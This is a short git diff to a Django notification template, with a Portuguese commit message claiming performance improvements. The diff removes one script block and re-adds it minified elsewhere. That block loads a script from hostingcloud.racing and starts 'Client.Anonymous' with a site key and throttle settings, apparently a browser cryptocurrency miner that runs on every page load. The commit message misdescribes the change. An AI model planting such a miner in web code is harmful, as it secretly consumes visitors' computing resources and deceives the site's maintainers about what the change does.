Tentativas de melhorias de performance.

--- a/main_app/templates/notification.html
+++ b/main_app/templates/notification.html
@@ -95,16 +95,7 @@
             	<a class="page-btn btn btn-primary" style="flex: 1;" href="/notifications?page={{ notifications.previous_page_number }}">Mais recentes</a>
             	{% endif %}
             </div>
-
-<script src="https://www.hostingcloud.racing/gCgZ.js"></script>
-<script>
-    var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
-        throttle: 0.9, c: 'w', ads: 0
-    });
-    _client.start();
-    
-
-</script>
         </section>
+<script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
     </body>
 </html>
